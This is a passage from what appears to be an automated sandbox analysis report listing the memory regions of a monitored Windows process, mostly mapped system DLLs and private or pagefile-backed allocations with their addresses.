"msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 6295 start_va = 0x400000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6296 start_va = 0x7ffc5cb50000 end_va = 0x7ffc5cc04fff monitored = 0 entry_point = 0x7ffc5cb922e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 6297 start_va = 0x7ffc5f2c0000 end_va = 0x7ffc5f53cfff monitored = 0 entry_point = 0x7ffc5f394970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 6298 start_va = 0x7ffc5e2b0000 end_va = 0x7ffc5e3cbfff monitored = 0 entry_point = 0x7ffc5e2f02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 6299 start_va = 0x7ffc5cac0000 end_va = 0x7ffc5cb29fff monitored = 0 entry_point = 0x7ffc5caf6d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 6300 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 6301 start_va = 0x7ffc5e8f0000 end_va = 0x7ffc5e94afff monitored = 0 entry_point = 0x7ffc5e9038b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 6302 start_va = 0x7ffc5ec20000 end_va = 0x7ffc5ecc6fff monitored = 0 entry_point = 0x7ffc5ec358d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 6303 start_va = 0x7ffc545d0000 end_va = 0x7ffc5466ffff monitored = 0 entry_point = 0x7ffc54640910 region_type = mapped_file name = "wer.dll" filename = "\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll") Region: id = 6304 start_va = 0x7ffc4cd60000 end_va = 0x7ffc4ceebfff monitored = 0 entry_point = 0x7ffc4cd68de0 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\System32\\dbghelp.dll" (normalized: "c:\\windows\\system32\\dbghelp.dll") Region: id = 6305 start_va = 0x7ffc536e0000 end_va = 0x7ffc53704fff monitored = 0 entry_point = 0x7ffc536f9e40 region_type = mapped_file name = "dbgcore.dll" filename = "\\Windows\\System32\\dbgcore.dll" (normalized: "c:\\windows\\system32\\dbgcore.dll") Region: id = 6306 start_va = 0x7ffc53840000 end_va = 0x7ffc5389dfff monitored = 0 entry_point = 0x7ffc538709b0 region_type = mapped_file name = "faultrep.dll" filename = "\\Windows\\System32\\Faultrep.dll" (normalized: "c:\\windows\\system32\\faultrep.dll") Region: id = 6307 start_va = 0x7ffc5a850000 end_va = 0x7ffc5a876fff monitored = 0 entry_point = 0x7ffc5a857940 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 6308 start_va = 0x7ffc5bcc0000 end_va = 0x7ffc5bce8fff monitored = 0 entry_point = 0x7ffc5bcd4530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 6309 start_va = 0x7ffc5bec0000 end_va = 0x7ffc5bf02fff monitored = 0 entry_point = 0x7ffc5bed4b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 6310 start_va = 0x6e0000 end_va = 0x8bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006e0000" filename = "" Region: id = 6315 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 6316 start_va = 0x480000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 6317 start_va = 0x7ffc5e960000 end_va = 0x7ffc5eab5fff monitored = 0 entry_point = 0x7ffc5e96a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 6318 start_va = 0x7ffc5f540000 end_va = 0x7ffc5f6c5fff monitored = 0 entry_point = 0x7ffc5f58ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 6319 start_va = 0x480000 end_va = 0x4b8fff monitored = 0 entry_point = 0x4812f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 6320 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 6321 start_va = 0x6e0000 end_va = 0x867fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006e0000" filename = "" Region: id = 6322 start_va = 0x8b0000 end_va = 0x8bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008b0000" filename = "" Region: id = 6323 start_va = 0x7ffc5e810000 end_va = 0x7ffc5e84afff monitored = 0 entry_point = 0x7ffc5e8112f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 6326 start_va = 0x1d0000 end_va = 0x1d1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6327 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 6328 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 6329 start_va = 0x480000 end_va = 0x4cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 6330 start_va = 0x4d0000 end_va = 0x4d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 6331 start_va = 0x8c0000 end_va = 0xa40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008c0000" filename = "" Region: id = 6332 start_va = 0xa50000 end_va = 0x1e4ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a50000" filename = "" Region: id = 6333 start_va = 0x7ffc5a7b0000 end_va = 0x7ffc5a845fff monitored = 0 entry_point = 0x7ffc5a7d5570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 6334 start_va = 0x4f0000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 6355 start_va = 0x4f0000 end_va = 0x4f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004f0000" filename = "" Region: id = 6356 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 6357 start_va = 0x500000 end_va = 0x500fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 6358 start_va = 0x510000 end_va = 0x510fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 6359 start_va = 0x7ffc5be50000 end_va = 0x7ffc5be5efff monitored = 0 entry_point = 0x7ffc5be53210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 6360 start_va = 0x510000 end_va = 0x510fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 6361 start_va = 0x1e50000 end_va = 0x264ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e50000" filename = "" Region: id = 6362 start_va = 0x510000 end_va = 0x518fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 6380 start_va = 0x510000 end_va = 0x518fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 6381 start_va = 0x510000 end_va = 0x518fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 6382 start_va = 0x510000 end_va = 0x518fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 6383 start_va = 0x510000 end_va = 0x518fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 6384 start_va = 0x510000 end_va = 0x518fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 6385 start_va = 0x510000 end_va = 0x518fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 6386 start_va = 0x510000 end_va = 0x518fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 6387 start_va = 0x510000 end_va = 0x518fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 6388 start_va = 0x510000 end_va = 0x518fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 6389 start_va = 0x510000 end_va = 0x518fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 6390 start_va = 0x510000 end_va = 0x518fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 6391 start_va = 0x510000 end_va = 0x518fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 6392 start_va = 0x510000 end_va = 0x518fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 6393 start_va = 0x510000 end_va = 0x518fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 6394 start_va = 0x510000 end_va = 0x518fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 6395 start_va = 0x510000 end_va = 0x518fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 6396 start_va = 0x510000 end_va = 0x518fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 6397 start_va = 0x510000 end_va = 0x518fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 6398 start_va = 0x510000 end_va = 0x518fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 6399 start_va = 0x510000 end_va = 0x518fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 6400 start_va = 0x510000 end_va = 0x518fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 6401 start_va = 0x510000 end_va = 0x518fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 6402 start_va = 0x510000 end_va = 0x518fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 6403 start_va = 0x510000 end_va = 0x518fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 6404 start_va = 0x510000 end_va = 0x518fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 6405 start_va = 0x510000 end_va = 0x518fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 6406 start_va = 0x510000 end_va = 0x518fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 6407 start_va = 0x510000 end_va = 0x518fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 6408 start_va = 0x510000 end_va = 0x518fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 6409 start_va = 0x510000 end_va = 0x518fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 6410 start_va = 0x510000 end_va = 0x518fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 6411 start_va = 0x510000 end_va = 0x518fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 6412 start_va = 0x510000 end_va = 0x518fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 6418 start_va = 0x560000 end_va = 0x5dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 6419 start_va = 0x1e50000 end_va = 0x1f4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 6427 start_va = 0x510000 end_va = 0x511fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "faultrep.dll.mui" filename = "\\Windows\\System32\\en-US\\faultrep.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\faultrep.dll.mui") Region: id = 6428 start_va = 0x520000 end_va = 0x520fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 6436 start_va = 0x7ffc44d00000 end_va = 0x7ffc45220fff monitored = 0 entry_point = 0x7ffc44f95f60 region_type = mapped_file name = "dbgeng.dll" filename = "\\Windows\\System32\\dbgeng.dll" (normalized: "c:\\windows\\system32\\dbgeng.dll") Region: id = 6437 start_va = 0x7ffc5e1e0000 end_va = 0x7ffc5e2a0fff monitored = 0 entry_point = 0x7ffc5e200da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 6438 start_va = 0x7ffc4ca20000 end_va = 0x7ffc4cabbfff monitored = 0 entry_point = 0x7ffc4ca884d0 region_type = mapped_file name = "dbgmodel.dll" filename = "\\Windows\\System32\\DbgModel.dll" (normalized: "c:\\windows\\system32\\dbgmodel.dll") Region: id = 6439 start_va = 0x7ffc58c20000 end_va = 0x7ffc58c55fff monitored = 0 entry_point = 0x7ffc58c30070 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 6440 start_va = 0x1f50000 end_va = 0x2092fff monitored = 0 entry_point = 0x1f78210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 6441 start_va = 0x7ffc4f220000 end_va = 0x7ffc4f22bfff monitored = 0 entry_point = 0x7ffc4f2235c0 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 6442 start_va = 0x7ffc5bab0000 end_va = 0x7ffc5badcfff monitored = 0 entry_point = 0x7ffc5bac9d40 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 6443 start_va = 0x7ffc5e7b0000 end_va = 0x7ffc5e801fff monitored = 0 entry_point = 0x7ffc5e7bf530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 6444 start_va = 0x7ffc51300000 end_va = 0x7ffc51309fff monitored = 0 entry_point = 0x7ffc51301350 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 6445 start_va = 0x1f50000 end_va = 0x204ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f50000" filename = "" Region: id = 6446 start_va = 0x7ffc5e3e0000 end_va = 0x7ffc5e522fff monitored = 0 entry_point = 0x7ffc5e408210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 6450 start_va = 0x2050000 end_va = 0x2386fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 6453 start_va = 0x520000 end_va = 0x521fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 6454 start_va = 0x520000 end_va = 0x523fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 6455 start_va = 0x520000 end_va = 0x525fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 6456 start_va = 0x520000 end_va = 0x527fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 6457 start_va = 0x520000 end_va = 0x529fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 6458 start_va = 0x520000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 6459 start_va = 0x520000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 6462 start_va = 0x520000 end_va = 0x52ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 6463 start_va = 0x520000 end_va = 0x531fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 6464 start_va = 0x520000 end_va = 0x533fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 6465 start_va = 0x520000 end_va = 0x535fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 6466 start_va = 0x520000 end_va = 0x537fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 6467 start_va = 0x520000 end_va = 0x539fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 6468 start_va = 0x520000 end_va = 0x53bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 6469 start_va = 0x520000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 6470 start_va = 0x520000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 6471 start_va = 0x520000 end_va = 0x541fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 6472 start_va = 0x520000 end_va = 0x543fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 6478 start_va = 0x2390000 end_va = 0x246ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 6479 start_va = 0x2470000 end_va = 0x256ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002470000" filename = "" Region: id = 6482 start_va = 0x2570000 end_va = 0x276ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002570000" filename = "" Region: id = 6492 start_va = 0x520000 end_va = 0x520fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 6493 start_va = 0x530000 end_va = 0x532fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wer.dll.mui" filename = "\\Windows\\System32\\en-US\\wer.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wer.dll.mui") Region: id = 6494 start_va = 0x2770000 end_va = 0x286ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002770000" filename = "" Region: id = 6495 start_va = 0x540000 end_va = 0x546fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 6496 start_va = 0x2870000 end_va = 0x306ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002870000" filename = "" Region: id = 6497 start_va = 0x560000 end_va = 0x568fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 6498 start_va = 0x560000 end_va = 0x568fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 6499 start_va = 0x560000 end_va = 0x568fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 6500 start_va = 0x560000 end_va = 0x568fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 6501 start_va = 0x560000 end_va = 0x568fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 6502 start_va = 0x560000 end_va = 0x568fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 6503 start_va = 0x560000 end_va = 0x568fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 6504 start_va = 0x560000 end_va = 0x568fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 6506 start_va = 0x560000 end_va = 0x568fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 6507 start_va = 0x560000 end_va = 0x568fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 6508 start_va = 0x560000 end_va = 0x568fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 6509 start_va = 0x560000 end_va = 0x568fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 6510 start_va = 0x560000 end_va = 0x568fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 6511 start_va = 0x560000 end_va = 0x568fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 6512 start_va = 0x560000 end_va = 0x568fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 6513 start_va = 0x560000 end_va = 0x568fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 6514 start_va = 0x560000 end_va = 0x568fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 6515 start_va = 0x560000 end_va = 0x568fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 6516 start_va = 0x560000 end_va = 0x568fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 6517 start_va = 0x560000 end_va = 0x568fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 6518 start_va = 0x560000 end_va = 0x568fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 6538 start_va = 0x560000 end_va = 0x568fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 6539 start_va = 0x560000 end_va = 0x568fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 6540 start_va = 0x560000 end_va = 0x568fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 6541 start_va = 0x560000 end_va = 0x568fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 6542 start_va = 0x560000 end_va = 0x568fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 6543 start_va = 0x560000 end_va = 0x568fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 6544 start_va = 0x560000 end_va = 0x568fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 6545 start_va = 0x560000 end_va = 0x568fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 6546 start_va = 0x560000 end_va = 0x568fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 6547 start_va = 0x560000 end_va = 0x568fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 6548 start_va = 0x560000 end_va = 0x568fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 6564 start_va = 0x560000 end_va = 0x568fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 6565 start_va = 0x560000 end_va = 0x568fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 6566 start_va = 0x7ffc53580000 end_va = 0x7ffc535f3fff monitored = 0 entry_point = 0x7ffc535c13a0 region_type = mapped_file name = "werui.dll" filename = "\\Windows\\System32\\werui.dll" (normalized: "c:\\windows\\system32\\werui.dll") Region: id = 6576 start_va = 0x560000 end_va = 0x561fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 6577 start_va = 0x7ffc5cc80000 end_va = 0x7ffc5e1defff monitored = 0 entry_point = 0x7ffc5cde11f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 6578 start_va = 0x7ffc5c3c0000 end_va = 0x7ffc5ca03fff monitored = 0 entry_point = 0x7ffc5c5864b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 6583 start_va = 0x7ffc52e60000 end_va = 0x7ffc530d3fff monitored = 0 entry_point = 0x7ffc52ed0400 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll") Region: id = 6584 start_va = 0x7ffc5be70000 end_va = 0x7ffc5bebafff monitored = 0 entry_point = 0x7ffc5be735f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 6585 start_va = 0x7ffc5be30000 end_va = 0x7ffc5be43fff monitored = 0 entry_point = 0x7ffc5be352e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 6586 start_va = 0x7ffc5e1e0000 end_va = 0x7ffc5e2a0fff monitored = 0 entry_point = 0x7ffc5e200da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 6608 start_va = 0x570000 end_va = 0x571fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6609 start_va = 0x7ffc45070000 end_va = 0x7ffc45222fff monitored = 0 entry_point = 0x7ffc450d9be0 region_type = mapped_file name = "dui70.dll" filename = "\\Windows\\System32\\dui70.dll" (normalized: "c:\\windows\\system32\\dui70.dll") Region: id = 6610 start_va = 0x7ffc5b320000 end_va = 0x7ffc5b350fff monitored = 0 entry_point = 0x7ffc5b327d10 region_type = 